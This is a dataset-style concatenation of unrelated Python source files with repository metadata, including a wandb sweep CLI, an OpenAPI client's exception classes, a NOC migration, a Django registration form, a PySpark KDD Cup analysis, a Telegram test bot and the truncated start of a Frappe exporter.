        "noise_std": {"values": [0.00001, 0.001, 0.01, 0.05, 0.1]},
        "increment": {"values": [True, False]},
        "epochs": {"values": [100, 200, 500, 1000]},
        "domains": {"values": [4]}
    },
}
# Build a small CLI
# CLI entry point: configure a wandb sweep (optionally from a custom JSON
# config) and run the requested number of agent iterations.
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Do hyperparameter \
optimization on FPC dataset")
    parser.add_argument('--datafile', type=str, nargs='?',
                        default="/home/zef/Documents/master/acse-9/DD-GAN-AE/\
submodules/DD-GAN/data/processed/cae_latent_sf_10vars_800steps_different.npy",
                        help='path to structured grid data file')
    parser.add_argument('--savemodel', type=str, nargs='?',
                        default="False",
                        help='Wether or not to save the models, set "True" for \
saving')
    parser.add_argument('--niters', type=int, nargs='?',
                        default=200,
                        help='Number of sweeps to execute')
    parser.add_argument('--custom_config', type=str, nargs='?',
                        default=None,
                        help='json file with custom configurations for sweep')
    parser.add_argument('--continuous', action='store_true', default=False,
                        help='whether to use continuous learning \
functionality')
    parser.add_argument('--encoder_folder', type=str, nargs='?',
                        default=None,
                        help='folder with autoencoder for generating latent \
variables')
    parser.add_argument('--model', type=str, nargs='?',
                        default=None,
                        help='Choose either ae (normal autoencoder) or aae \
(adversarial autoencoder)')
    args = parser.parse_args()
    arg_dict = vars(args)

    # NOTE(review): this branch references two names that are never defined
    # or imported in this module — Continuous_predictive_adversarial_sweep_config
    # (only bound when --custom_config is supplied) and
    # continuous_train_wandb_pred_aae — so --continuous raises NameError
    # unless a custom config is given AND the train function is added; also
    # note execution falls through to the --model checks afterwards. Confirm
    # intended behavior.
    if args.continuous:
        if arg_dict['custom_config'] is not None:
            with open(arg_dict["custom_config"]) as json_file:
                Continuous_predictive_adversarial_sweep_config = \
                    json.load(json_file)
        if arg_dict["savemodel"] == "True":
            Continuous_predictive_adversarial_sweep_config['parameters'][
                'savemodel'] = \
                {'values': [True]}
        Continuous_predictive_adversarial_sweep_config['parameters'][
            'datafile'] = \
            {'values': [arg_dict['datafile']]}
        Continuous_predictive_adversarial_sweep_config['parameters'][
            'encoder_folder'] = \
            {'values': [arg_dict['encoder_folder']]}
        sweep_id = wandb.sweep(Continuous_predictive_adversarial_sweep_config,
                               project='pred-aae', entity='zeff020')
        wandb.agent(sweep_id, continuous_train_wandb_pred_aae,
                    count=arg_dict['niters'])

    if args.model == "ae":
        # Use the normal autoencoder for predictions
        if arg_dict['custom_config'] is not None:
            with open(arg_dict["custom_config"]) as json_file:
                Predictive_ae_sweep_config = json.load(json_file)
        if arg_dict["savemodel"] == "True":
            Predictive_ae_sweep_config['parameters']['savemodel'] = \
                {'values': [True]}
        Predictive_ae_sweep_config['parameters']['datafile'] = \
            {'values': [arg_dict['datafile']]}
        sweep_id = wandb.sweep(Predictive_ae_sweep_config,
                               project='pred-ae-fpc', entity='zeff020')
        wandb.agent(sweep_id, train_wandb_pred_ae, count=arg_dict['niters'])
    elif args.model == "aae":
        # Use the adversarial autoencoder for predictions
        if arg_dict['custom_config'] is not None:
            with open(arg_dict["custom_config"]) as json_file:
                Predictive_adversarial_sweep_config = json.load(json_file)
        if arg_dict["savemodel"] == "True":
            Predictive_adversarial_sweep_config['parameters']['savemodel'] = \
                {'values': [True]}
        Predictive_adversarial_sweep_config['parameters']['datafile'] = \
            {'values': [arg_dict['datafile']]}
        sweep_id = wandb.sweep(Predictive_adversarial_sweep_config,
                               project='pred-aae-fpc', entity='zeff020')
        wandb.agent(sweep_id, train_wandb_pred_aae, count=arg_dict['niters'])
| 37.34019
| 80
| 0.553159
|
4a0a0e32860dca9f20516811ec5d5c2bd587c244
| 4,545
|
py
|
Python
|
dyspatch_client/exceptions.py
|
getdyspatch/dyspatch-python
|
23ffb05eff820944acf235fa3b225bf8caec903d
|
[
"Apache-2.0"
] | null | null | null |
dyspatch_client/exceptions.py
|
getdyspatch/dyspatch-python
|
23ffb05eff820944acf235fa3b225bf8caec903d
|
[
"Apache-2.0"
] | null | null | null |
dyspatch_client/exceptions.py
|
getdyspatch/dyspatch-python
|
23ffb05eff820944acf235fa3b225bf8caec903d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Dyspatch API
# Introduction The Dyspatch API is based on the REST paradigm, and features resource based URLs with standard HTTP response codes to indicate errors. We use standard HTTP authentication and request verbs, and all responses are JSON formatted. See our [Implementation Guide](https://docs.dyspatch.io/development/implementing_dyspatch/) for more details on how to implement Dyspatch. ## API Client Libraries Dyspatch provides API Clients for popular languages and web frameworks. - [Java](https://github.com/getdyspatch/dyspatch-java) - [Javascript](https://github.com/getdyspatch/dyspatch-javascript) - [Python](https://github.com/getdyspatch/dyspatch-python) - [C#](https://github.com/getdyspatch/dyspatch-dotnet) - [Go](https://github.com/getdyspatch/dyspatch-golang) - [Ruby](https://github.com/getdyspatch/dyspatch-ruby) # noqa: E501
The version of the OpenAPI document: 2020.11
Contact: support@dyspatch.io
Generated by: https://openapi-generator.tech
"""
import six
class OpenApiException(Exception):
    """The base exception class for all OpenAPIExceptions"""


class ApiTypeError(OpenApiException, TypeError):

    def __init__(self, msg, path_to_item=None, valid_classes=None,
                 key_type=None):
        """Raised when a value has the wrong type.

        Args:
            msg (str): the exception message

        Keyword Args:
            path_to_item (list): keys and indices leading to the offending
                item; None if unset
            valid_classes (tuple): the primitive classes the current item
                should be an instance of; None if unset
            key_type (bool): True if the item is a dict key, False if it is
                a dict value or list item; None if unset
        """
        self.path_to_item = path_to_item
        self.valid_classes = valid_classes
        self.key_type = key_type
        # Append the rendered path to the message when a location is known.
        if path_to_item:
            msg = "{0} at {1}".format(msg, render_path(path_to_item))
        super(ApiTypeError, self).__init__(msg)


class ApiValueError(OpenApiException, ValueError):

    def __init__(self, msg, path_to_item=None):
        """Raised when a value is invalid.

        Args:
            msg (str): the exception message

        Keyword Args:
            path_to_item (list): path to the error inside the received data;
                None if unset
        """
        self.path_to_item = path_to_item
        if path_to_item:
            msg = "{0} at {1}".format(msg, render_path(path_to_item))
        super(ApiValueError, self).__init__(msg)


class ApiKeyError(OpenApiException, KeyError):

    def __init__(self, msg, path_to_item=None):
        """Raised when a required key is missing or unexpected.

        Args:
            msg (str): the exception message

        Keyword Args:
            path_to_item (None/list): path to the error inside the received
                data
        """
        self.path_to_item = path_to_item
        if path_to_item:
            msg = "{0} at {1}".format(msg, render_path(path_to_item))
        super(ApiKeyError, self).__init__(msg)


class ApiException(OpenApiException):
    """Raised for non-success HTTP responses from the API."""

    def __init__(self, status=None, reason=None, http_resp=None):
        # Prefer the response object when one is supplied; otherwise fall
        # back to the explicit status/reason pair with no body or headers.
        if http_resp:
            self.status, self.reason = http_resp.status, http_resp.reason
            self.body, self.headers = http_resp.data, http_resp.getheaders()
        else:
            self.status, self.reason = status, reason
            self.body = self.headers = None

    def __str__(self):
        """Custom error messages for exception"""
        parts = [
            "({0})\n".format(self.status),
            "Reason: {0}\n".format(self.reason),
        ]
        if self.headers:
            parts.append("HTTP response headers: {0}\n".format(self.headers))
        if self.body:
            parts.append("HTTP response body: {0}\n".format(self.body))
        return "".join(parts)
def render_path(path_to_item):
    """Returns a string representation of a path.

    Integer components render as list indices (``[0]``); all other
    components render as quoted dict keys (``['key']``).
    """
    result = ""
    for pth in path_to_item:
        # six.integer_types == (int,) on Python 3, so the builtin check is
        # equivalent and drops the third-party dependency for this helper.
        if isinstance(pth, int):
            result += "[{0}]".format(pth)
        else:
            result += "['{0}']".format(pth)
    return result
| 37.254098
| 845
| 0.607921
|
4a0a0e33aceedad16ba0891672cc2d4e6d65f6bb
| 1,859
|
py
|
Python
|
ip/migrations/0004_default_vrf.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 84
|
2017-10-22T11:01:39.000Z
|
2022-02-27T03:43:48.000Z
|
ip/migrations/0004_default_vrf.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 22
|
2017-12-11T07:21:56.000Z
|
2021-09-23T02:53:50.000Z
|
ip/migrations/0004_default_vrf.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 23
|
2017-12-06T06:59:52.000Z
|
2022-02-24T00:02:25.000Z
|
# ----------------------------------------------------------------------
# default vrf
# ----------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# NOC modules
from noc.core.migration.base import BaseMigration
class Migration(BaseMigration):
    """Seed default IPAM objects when the tables are empty: a 'default' VRF
    group, AS0 (with the first available maintainer), the 'default' VRF
    (RD 0:0) and the root IPv4 block 0.0.0.0/0."""

    # The default maintainer must exist before AS0 can reference it.
    depends_on = [("peer", "0017_default_maintainer")]

    def migrate(self):
        # Each INSERT is guarded by a COUNT(*) check so the migration is
        # effectively idempotent on the seeded rows.
        if self.db.execute("SELECT COUNT(*) FROM ip_vrfgroup")[0][0] == 0:
            self.db.execute("INSERT INTO ip_vrfgroup(name) VALUES(%s)", ["default"])
        if self.db.execute("SELECT COUNT(*) FROM peer_as WHERE asn=%s", [0])[0][0] == 0:
            maintainer_id = self.db.execute("SELECT id FROM peer_maintainer LIMIT 1")[0][0]
            self.db.execute(
                "INSERT INTO peer_as(asn,description,maintainer_id) VALUES(%s,%s,%s)",
                [0, "Default", maintainer_id],
            )
        if self.db.execute("SELECT COUNT(*) FROM ip_vrf")[0][0] == 0:
            vg_id = self.db.execute("SELECT id FROM ip_vrfgroup LIMIT 1")[0][0]
            self.db.execute(
                "INSERT INTO ip_vrf(name,vrf_group_id,rd) VALUES(%s,%s,%s)",
                ["default", vg_id, "0:0"],
            )
            # Root prefix is attributed to the first user and AS0; 'now' is
            # passed as the last_modified timestamp literal.
            vrf_id = self.db.execute("SELECT id FROM ip_vrf LIMIT 1")[0][0]
            user_id = self.db.execute("SELECT id FROM auth_user LIMIT 1")[0][0]
            asn_id = self.db.execute("SELECT id FROM peer_as WHERE asn=%s", [0])[0][0]
            self.db.execute(
                """INSERT INTO ip_ipv4block(prefix,description,vrf_id,asn_id,modified_by_id,last_modified)
VALUES(%s,%s,%s,%s,%s,%s)""",
                ["0.0.0.0/0", "Root", vrf_id, asn_id, user_id, "now"],
            )

    def backwards(self):
        # Seeded defaults are intentionally not removed on rollback.
        pass
| 45.341463
| 106
| 0.506724
|
4a0a0ec700a852b6f5a41cac3e66fcbf0bc90eb4
| 925
|
py
|
Python
|
src/django_rpx_plus/forms.py
|
wsantos/django-rpx-plus
|
3c5ffc3d2a5bcacdf04f191c6ab04ae006c9a730
|
[
"BSD-3-Clause"
] | 1
|
2021-03-06T14:23:01.000Z
|
2021-03-06T14:23:01.000Z
|
src/django_rpx_plus/forms.py
|
wsantos/django-rpx-plus
|
3c5ffc3d2a5bcacdf04f191c6ab04ae006c9a730
|
[
"BSD-3-Clause"
] | 1
|
2017-12-06T17:42:57.000Z
|
2017-12-06T17:42:57.000Z
|
src/django_rpx_plus/forms.py
|
wsantos/django-rpx-plus
|
3c5ffc3d2a5bcacdf04f191c6ab04ae006c9a730
|
[
"BSD-3-Clause"
] | 7
|
2016-03-30T22:15:04.000Z
|
2022-01-12T18:10:26.000Z
|
from django import forms
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
class RegisterForm(forms.Form):
    """Registration form collecting a unique username and an email address."""

    # Usernames are limited to word characters (letters, digits, underscore),
    # max 30 characters.
    username = forms.RegexField(regex=r'^\w+$', max_length = 30, label = _('Username'),
                                error_messages={'invalid':_('The username must contain only letters, numbers and underscores.')})
    email = forms.EmailField(label = _('Email Address'), max_length = 254)

    def clean_username(self):
        """Validate that the username is not already taken (EAFP lookup)."""
        username = self.cleaned_data['username']
        #Checking to make sure that username is unique.
        try:
            User.objects.get(username = username)
        except User.DoesNotExist:
            #This is good, means that we can use this username:
            return username
        #Otherwise, username exists. We can't use it.
        raise forms.ValidationError(_('Username already exists! Please choose another one.'))
| 44.047619
| 129
| 0.667027
|
4a0a0f110092a5f3a928f69091c2a7b893abbfdf
| 2,937
|
py
|
Python
|
GoogleCloudPlatform/DataProc-Training/spark_analysis.py
|
jpacerqueira/project_lost_saturn
|
ce23e2881242441c9c74b2f0a66af1ebc5d3f351
|
[
"Apache-2.0"
] | 1
|
2020-04-13T09:19:43.000Z
|
2020-04-13T09:19:43.000Z
|
GoogleCloudPlatform/DataProc-Training/spark_analysis.py
|
jpacerqueira/project_lost_saturn
|
ce23e2881242441c9c74b2f0a66af1ebc5d3f351
|
[
"Apache-2.0"
] | 1
|
2020-10-28T12:45:32.000Z
|
2020-10-28T12:45:32.000Z
|
GoogleCloudPlatform/DataProc-Training/spark_analysis.py
|
jpacerqueira/project_lost_saturn
|
ce23e2881242441c9c74b2f0a66af1ebc5d3f351
|
[
"Apache-2.0"
] | 4
|
2020-03-14T05:17:37.000Z
|
2022-01-06T16:29:38.000Z
|
# Batch job: load the KDD Cup 10% dataset from GCS, summarise connection and
# attack statistics with Spark SQL, render a report chart, and publish the
# results back to a GCS bucket.
import matplotlib
matplotlib.use('agg')  # headless backend: no display exists on a Dataproc worker
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("--bucket", help="bucket for input and output")
args = parser.parse_args()
BUCKET = args.bucket  # output bucket for the report and CSV results

from pyspark.sql import SparkSession, SQLContext, Row

# NOTE(review): the input bucket is hard-coded while the output bucket comes
# from --bucket; confirm this split is intentional.
gcs_bucket='qwiklabs-gcp-ffc84680e86718f5'
spark = SparkSession.builder.appName("kdd").getOrCreate()
sc = spark.sparkContext
# NOTE(review): double slash in the object path — GCS tolerates it, but it
# looks unintended.
data_file = "gs://"+gcs_bucket+"//kddcup.data_10_percent.gz"
raw_rdd = sc.textFile(data_file).cache()
raw_rdd.take(5)  # forces evaluation so the cache is populated
csv_rdd = raw_rdd.map(lambda row: row.split(","))
# Project a subset of the KDD columns into named Row fields (note that some
# indices, e.g. r[6] and r[11], are deliberately skipped).
parsed_rdd = csv_rdd.map(lambda r: Row(
    duration=int(r[0]),
    protocol_type=r[1],
    service=r[2],
    flag=r[3],
    src_bytes=int(r[4]),
    dst_bytes=int(r[5]),
    wrong_fragment=int(r[7]),
    urgent=int(r[8]),
    hot=int(r[9]),
    num_failed_logins=int(r[10]),
    num_compromised=int(r[12]),
    su_attempted=r[14],  # kept as a string; the SUM() below relies on implicit casting
    num_root=int(r[15]),
    num_file_creations=int(r[16]),
    label=r[-1]
)
)
parsed_rdd.take(5)
sqlContext = SQLContext(sc)
df = sqlContext.createDataFrame(parsed_rdd)
# Connection counts per protocol, most frequent first.
connections_by_protocol = df.groupBy('protocol_type').count().orderBy('count', ascending=False)
connections_by_protocol.show()
df.registerTempTable("connections")
# Aggregate traffic/attack statistics per (protocol, attack-vs-normal) pair.
attack_stats = sqlContext.sql("""
    SELECT
        protocol_type,
        CASE label
            WHEN 'normal.' THEN 'no attack'
            ELSE 'attack'
        END AS state,
        COUNT(*) as total_freq,
        ROUND(AVG(src_bytes), 2) as mean_src_bytes,
        ROUND(AVG(dst_bytes), 2) as mean_dst_bytes,
        ROUND(AVG(duration), 2) as mean_duration,
        SUM(num_failed_logins) as total_failed_logins,
        SUM(num_compromised) as total_compromised,
        SUM(num_file_creations) as total_file_creations,
        SUM(su_attempted) as total_root_attempts,
        SUM(num_root) as total_root_acceses
    FROM connections
    GROUP BY protocol_type, state
    ORDER BY 3 DESC
    """)
attack_stats.show()
# %matplotlib inline
ax = attack_stats.toPandas().plot.bar(x='protocol_type', subplots=True, figsize=(10,25))
ax[0].get_figure().savefig('report.png');
import google.cloud.storage as gcs
bucket = gcs.Client().get_bucket(BUCKET)
# Clear any previous run's artifacts before uploading fresh ones.
for blob in bucket.list_blobs(prefix='sparktobq/'):
    blob.delete()
# NOTE(review): a PNG file is uploaded under a .pdf object name — confirm the
# destination name; downstream consumers may expect report.png.
bucket.blob('sparktobq/report.pdf').upload_from_filename('report.png')
connections_by_protocol.write.format("csv").mode("overwrite").save(
    "gs://{}/sparktobq/connections_by_protocol".format(BUCKET))
| 39.16
| 96
| 0.586994
|
4a0a10824f8cc383f019851f642e665b100e0664
| 13,597
|
py
|
Python
|
usability_tests_simulation/bot.py
|
PEI-I1/Telegram-API-Endpoint
|
6b6c4feaa3577f2860672277965c626a76adde82
|
[
"MIT"
] | null | null | null |
usability_tests_simulation/bot.py
|
PEI-I1/Telegram-API-Endpoint
|
6b6c4feaa3577f2860672277965c626a76adde82
|
[
"MIT"
] | 1
|
2021-06-02T00:54:33.000Z
|
2021-06-02T00:54:33.000Z
|
usability_tests_simulation/bot.py
|
PEI-I1/Telegram-API-Endpoint
|
6b6c4feaa3577f2860672277965c626a76adde82
|
[
"MIT"
] | null | null | null |
import requests
from config import TELEGRAM_SEND_MESSAGE_URL, TELEGRAM_SEND_PHOTO_URL, TELEGRAM_SEND_TYPING_ACTION
import json
import re
import time
class Bot:
    """Simulated Telegram bot used for usability tests.

    Replays a fixed script of canned answers (cinema listings, movie details,
    NOS tariff information, ...) keyed by an internal step counter, and records
    every user input for later analysis.
    """

    def __init__(self):
        self.chat = None  # ID of Telegram chat
        self.message_received = None  # Message received on Telegram chat
        self.first_name = None  # First name of the user
        self.msg_count = 1  # To control the test order
        self.inputs = []  # Save inputs received

    def send_message(self, html_text):
        # Deliver an HTML-formatted text message to the current chat.
        # Returns True on HTTP 200, False otherwise.
        res = requests.get(TELEGRAM_SEND_MESSAGE_URL.format(self.chat, html_text, 'HTML'))
        if res.status_code == 200:
            return True
        else:
            return False

    def send_movie(self, html_text, banner_url):
        # Send a photo (movie banner) with an HTML caption to the current chat.
        # Returns True on HTTP 200, False otherwise.
        res = requests.get(TELEGRAM_SEND_PHOTO_URL.format(self.chat, banner_url, html_text, 'HTML'))
        if res.status_code == 200:
            return True
        else:
            return False

    def send_typing_action(self):
        # Show the "typing..." chat action; the response is deliberately ignored.
        res = requests.get(TELEGRAM_SEND_TYPING_ACTION.format(self.chat, 'typing'))

    def parse_data(self, data):
        # Extract chat id, message text (lower-cased) and the sender's first
        # name from a Telegram update payload, and record the raw input.
        message = data['message']
        self.chat = message['chat']['id']
        self.message_received = message['text'].lower()
        self.first_name = message['from']['first_name']
        self.inputs.append(self.message_received)

    def save_on_file(self):
        # Append every recorded input to inputs_received.txt.
        # NOTE(review): the loop variable shadows the built-in `input`.
        f = open("inputs_received.txt", "a")
        for input in self.inputs:
            f.write(input + '\n')
        f.close()

    def action(self):
        """Answer the current message according to the scripted test step."""
        if self.message_received == '/start':
            self.send_message('Olá ' + self.first_name + '!\nEm que te posso ajudar?')
        elif re.match(r'passo [0-9][01234]?', self.message_received):
            # "passo N" jumps directly to test step N.
            # NOTE(review): the pattern is unanchored, so e.g. "passo 95"
            # matches on the "passo 9" prefix yet sets the counter to 95 —
            # confirm whether out-of-range steps should be rejected.
            words = self.message_received.split(' ')
            count = int(words[1])
            self.msg_count = count
            self.send_message('Ok. Estou agora no passo ' + str(count) + '.')
        else:
            if self.msg_count == 1:
                self.send_typing_action()
                time.sleep(5)
                # Step 1: the user asks for the cinemas closest to them.
                self.send_message('Os cinemas NOS perto de si num raio de 20Km são:\nBraga Parque')
            elif self.msg_count == 2:
                # Step 2: the user asks which cinemas exist in Lisbon.
                self.send_message('Os cinemas NOS que correspondem com a sua pesquisa são:\nColombo,\nAmoreiras,\nAlvaláxia,\nVasco da Gama')
            elif self.msg_count == 3:
                # Step 3: the user asks for the movies showing in the Algarve (search_term).
                self.send_message('Os filmes em exibição no Forum Algarve são:\nQu\'est-ce qu\'on a encore fait au Bon Dieu?,\nFrozen II,\nKnives Out,\nCharlie’s Angels,\nThe Aeronauts,\nStar Wars: Episode IX - The Rise of Skywalker')
                self.send_message('Os filmes em exibição no Mar Shopping Algarve são:\nFrozen II,\nKnives Out,\nCharlie’s Angels,\nThe Aeronauts,\nLe Mans 66\',\nBikes,\nStar Wars: Episode IX - The Rise of Skywalker')
            elif self.msg_count == 4:
                # Step 4: the user asks for movies featuring Kevin Hart.
                self.send_movie(
                    '<b>Título:</b> Jumanji: O Nível Seguinte\n' +
                    '<b>Título original:</b> Jumanji: The Next Level\n' +
                    '<b>Elenco:</b> Dwayne Johnson, Jack Black, Kevin Hart\n' +
                    '<b>Produtor:</b> Jake Kasdan\n' +
                    '<b>Género:</b> Aventura\n' +
                    '<b>Duração:</b> 120 minutos\n' +
                    '<b>Idade:</b> 18 anos\n' +
                    '<b>Sinopse:</b> O gang está de volta, mas o jogo mudou. Quando regressam a Jumanji para resgatar um deles, descobrem que nada é como estavam à espera. Os jogadores terão de enfrentar lugares desconhecidos e inexplorados, desde os áridos desertos às montanhas nevadas, para escapar do jogo mais perigoso do mundo.\n' +
                    '<b>Trailer:</b> https://youtube.com/embed/yx9u6IsJrxM',
                    'http://cinemas.nos.pt/_layouts/15/Handlers/RenderImage.ashx?file=52259.jpg'
                )
            # NOTE(review): this `if` breaks the elif chain above. Behaviour is
            # unchanged (the step values are mutually exclusive), but it should
            # probably read `elif` for consistency with the other branches.
            if self.msg_count == 5:
                # Step 5: the user asks for upcoming premieres.
                self.send_message('As próximas estreias dos cinemas NOS são:')
                self.send_movie(
                    '<b>Título:</b> Jumanji: The Next Level\n' +
                    '<b>Elenco:</b> Dwayne Johnson, Jack Black, Kevin Hart\n' +
                    '<b>Género:</b> Aventura',
                    'http://cinemas.nos.pt/_layouts/15/Handlers/RenderImage.ashx?file=52259.jpg'
                )
                self.send_movie(
                    '<b>Título:</b> 21 Bridges\n' +
                    '<b>Elenco:</b> Chadwick Boseman, J.K. Simmons, Sienna Miller\n' +
                    '<b>Género:</b> Ação',
                    'http://cinemas.nos.pt/_layouts/15/Handlers/RenderImage.ashx?file=52264.jpg'
                )
            elif self.msg_count == 6:
                # Step 6: the user asks for the next sessions.
                self.send_message('Próximas sessões no Braga Parque:')
                self.send_message(
                    '<b>Filme</b>: Joker\n' +
                    '<b>Data</b>: 09-12-2019\n' +
                    '<b>Hora de início</b>: 21:00:00\n' +
                    '<b>Lugares disponíveis</b>: 10\n' +
                    '<b>Link de compra</b>: https://bilheteira.cinemas.nos.pt/webticket/bilhete.jsp?CinemaId=WA&CodFilme=1983870&DataSessao=2019-12-09&HoraSessao=21:00&Sala=5'
                )
                self.send_message(
                    '<b>Filme</b>: The Aeronauts\n' +
                    '<b>Data</b>: 09-12-2019\n' +
                    '<b>Hora de início</b>: 21:20:00\n' +
                    '<b>Lugares disponíveis</b>: 17\n' +
                    '<b>Link de compra</b>: https://bilheteira.cinemas.nos.pt/webticket/bilhete.jsp?CinemaId=WA&CodFilme=1728200&DataSessao=2019-12-09&HoraSessao=21:20&Sala=6'
                )
                self.send_message(
                    '<b>Filme</b>: Playing with Fire\n' +
                    '<b>Data</b>: 09-12-2019\n' +
                    '<b>Hora de início</b>: 21:50:00\n' +
                    '<b>Lugares disponíveis</b>: 24\n' +
                    '<b>Link de compra</b>: https://bilheteira.cinemas.nos.pt/webticket/bilhete.jsp?CinemaId=WA&CodFilme=1736700&DataSessao=2019-12-09&HoraSessao=21:50&Sala=9'
                )
            elif self.msg_count == 7:
                # Step 7: the user asks for the next sessions of the movie Countdown.
                self.send_message('Próximas sessões do filme Countdown no Braga Parque:')
                self.send_message(
                    '<b>Data</b>: 09-12-2019\n' +
                    '<b>Hora de início</b>: 22:00:00\n' +
                    '<b>Lugares disponíveis</b>: 45\n' +
                    '<b>Link de compra</b>: https://bilheteira.cinemas.nos.pt/webticket/bilhete.jsp?CinemaId=WA&CodFilme=1000318&DataSessao=2019-12-09&HoraSessao=22:00&Sala=1'
                )
                self.send_message(
                    '<b>Data</b>: 09-12-2019\n' +
                    '<b>Hora de início</b>: 00:25:00\n' +
                    '<b>Lugares disponíveis</b>: 60\n' +
                    '<b>Link de compra</b>: https://bilheteira.cinemas.nos.pt/webticket/bilhete.jsp?CinemaId=WA&CodFilme=1000318&DataSessao=2019-12-10&HoraSessao=00:25&Sala=1'
                )
            elif self.msg_count == 8:
                # Step 8: the user asks for the support line for questions about NOS bundles.
                self.send_message('Linha de apoio para pacotes com televisão:')
                self.send_message(
                    '<b>Número:</b> 16990\n' +
                    'Para esclarecimentos ou informações adicionais sobre todos os produtos incluídos na fatura de televisão NOS (internet fixa, telefone, telemóvel e internet móvel)'
                )
            elif self.msg_count == 9:
                # Step 9: the user asks for the Sony Xperia 1 details.
                self.send_message('Sony Xperia 1')
                self.send_message(
                    '<b>Preço:</b> 959,99€\n' +
                    '<b>Ofertas:</b> Coluna Bluetooth\n' +
                    '<b>Link:</b> https://www.nos.pt/particulares/loja-equipamentos/pages/details.aspx?p=29783\n' +
                    '* possibilidade de pagamento em prestações\n' +
                    '* possibilidade de pagamento com pontos'
                )
            elif self.msg_count == 10:
                # Step 10: the user asks which phones are currently on sale.
                self.send_message('Os telemóveis que correspondem à procura são:')
                self.send_message(
                    '<b>Modelo:</b> Huawei P30 Pro\n' +
                    '<b>Preço:</b> 899,99€'
                )
                self.send_message(
                    '<b>Modelo:</b> Huawei Mate 20 Lite\n' +
                    '<b>Preço:</b> 239,99€'
                )
                self.send_message(
                    '<b>Modelo:</b> Huawei P30\n' +
                    '<b>Preço:</b> 689,99€'
                )
                self.send_message(
                    '<b>Modelo:</b> Samsung Galaxy S10\n' +
                    '<b>Preço:</b> 819,99€'
                )
                self.send_message(
                    '<b>Modelo:</b> Samsung Galaxy S10+\n' +
                    '<b>Preço:</b> 919,99€'
                )
            elif self.msg_count == 11:
                # Step 11: the user asks for WTF tariffs.
                self.send_message('Os pacotes WTF que correspondem à procura são:')
                self.send_message(
                    '<b>Nome:</b> WTF 1GB\n' +
                    '<b>Preço:</b> 2.75/semana\n' +
                    '<b>Net:</b> 1GB/mês\n' +
                    '<b>SMS:</b> SMS grátis para todas as redes\n' +
                    '<b>Chamadas:</b> 1000 minutos para todas as redes'
                )
                self.send_message(
                    '<b>Nome:</b> WTF 5GB\n' +
                    '<b>Preço:</b> 3.99/semana\n' +
                    '<b>Net:</b> 5GB/mês\n' +
                    '<b>SMS:</b> SMS grátis para todas as redes\n' +
                    '<b>Chamadas:</b> 5000 minutos para todas as redes'
                )
                self.send_message(
                    '<b>Nome:</b> WTF 10GB\n' +
                    '<b>Preço:</b> 4.99/semana\n' +
                    '<b>Net:</b> 10GB/mês\n' +
                    '<b>SMS:</b> SMS grátis para todas as redes\n' +
                    '<b>Chamadas:</b> 10000 minutos para todas as redes'
                )
            elif self.msg_count == 12:
                # Step 12: the user asks for fibre bundles costing up to 25€/month.
                self.send_message('Os pacotes fibra com valor entre 0€ e 25€ são:')
                self.send_message(
                    '<b>Nome:</b> MIX\n' +
                    '<b>Preço:</b> 24,99€\n' +
                    '<b>Serviço:</b> TV'
                )
                self.send_message(
                    '<b>Nome:</b> NOS 2\n' +
                    '<b>Preço:</b> 13,49€\n' +
                    '<b>Serviço:</b> TV+VOZ'
                )
                self.send_message(
                    '<b>Nome:</b> Segunda Casa\n' +
                    '<b>Preço:</b> 13,99€\n' +
                    '<b>Serviço:</b> TV'
                )
                self.send_message(
                    '<b>Nome:</b> Light\n' +
                    '<b>Preço:</b> 13,99€\n' +
                    '<b>Serviço:</b> TV'
                )
            elif self.msg_count == 13:
                # Step 13: the user asks for satellite bundles with TV and Internet.
                self.send_message('Os pacotes satélite com serviço TV+NET disponíveis são:')
                self.send_message(
                    '<b>Nome:</b> NOS 2 Segunda Casa + Net\n' +
                    '<b>Preço:</b> 27,99€\n' +
                    '<b>Serviço:</b> TV+NET'
                )
                self.send_message(
                    '<b>Nome:</b> NOS 2 Segunda Casa + Net\n' +
                    '<b>Preço:</b> 30,49€\n' +
                    '<b>Serviço:</b> TV+NET'
                )
                self.send_message(
                    '<b>Nome:</b> NOS 2 Segunda Casa + Net\n' +
                    '<b>Preço:</b> 27,99€\n' +
                    '<b>Serviço:</b> TV+NET'
                )
            elif self.msg_count == 14:
                # Step 14: the user asks which NOS stores exist in Portalegre.
                self.send_message('As lojas NOS existentes em Portalegre são:')
                self.send_message(
                    '<b>Nome:</b> Loja NOS Portalegre - Continente\n' +
                    '<b>Morada:</b> CC Continente Portalegre - R. Joinal, 12 - lj. 1 Portalegre 7300-526\n' +
                    '<b>Horário:</b> Segunda a Sexta: 09h00 - 21h00\n' +
                    '                     Sábado: 09h00 - 21h00\n' +
                    '                     Domingo: 09h00 - 21h00'
                )
            elif self.msg_count > 14:
                self.send_message('Chegaste ao fim do teste!')
            # Advance to the next scripted step after answering.
            self.msg_count = self.msg_count + 1
| 52.296154
| 338
| 0.503935
|
4a0a133651b0f7982fa7d1e75021f71caa365f6e
| 9,097
|
py
|
Python
|
frappe/core/doctype/data_import/exporter.py
|
gangadhar-kadam/saloon-frappe
|
ec4bb97f8e63449324d07346ec87a76c6d075b40
|
[
"MIT"
] | null | null | null |
frappe/core/doctype/data_import/exporter.py
|
gangadhar-kadam/saloon-frappe
|
ec4bb97f8e63449324d07346ec87a76c6d075b40
|
[
"MIT"
] | null | null | null |
frappe/core/doctype/data_import/exporter.py
|
gangadhar-kadam/saloon-frappe
|
ec4bb97f8e63449324d07346ec87a76c6d075b40
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe, json
from frappe import _
import frappe.permissions
import re, csv, os
from frappe.utils.csvutils import UnicodeWriter
from frappe.utils import cstr, formatdate, format_datetime
from frappe.core.doctype.data_import.importer import get_data_keys
from six import string_types
# Map single-letter flag names (as accepted in the "flags" field of a data
# import filter) to the corresponding `re` module flag constants.
reflags = {
    "I":re.I,
    "L":re.L,
    "M":re.M,
    "U":re.U,
    "S":re.S,
